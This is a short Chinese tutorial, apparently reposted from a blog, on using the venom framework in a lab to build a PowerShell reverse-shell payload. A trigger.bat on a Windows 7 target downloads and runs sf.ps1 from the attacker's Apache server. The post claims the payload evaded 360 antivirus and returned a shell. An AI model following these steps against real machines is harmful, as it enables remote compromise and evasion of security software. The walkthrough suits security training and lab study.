轉載請注明作者:admin-神風
下載地址:https://github.com/r00t-3xp10it/venom
1.從Github上下載框架: tar.gz OR zip OR git clone 2.賦予文件可執行權限: cd venom-main sudo chmod -R +x *.sh sudo chmod -R +x *.py 3.安裝依賴關系包: cd aux sudo ./setup.sh 4.運行 sudo ./venom.sh
目標機:win7 sp1 ip:192.168.0.104
攻擊機:kali 2.0 ip:192.168.149.129
運行后提示按ENTER(回車)
會出現一個目錄菜單
這里利用目標機的Powershell來反彈shell
選擇11
然后提示輸入本機ip
提示輸入端口
然后輸入代碼的名稱
選中監聽模塊
確定反彈模塊
確定后會在Venom/output目錄下生成需要的payload,並且啟動一個msf監聽的小窗口
將trigger.bat放到目標機上,sf.ps1放到/var/www/html目錄下
打開apache服務
service apache2 start
運行bat文件后會利用powershell去遠程執行http://192.168.149.129/sf.ps1的文件
下面是成功過360並且成功反彈的截圖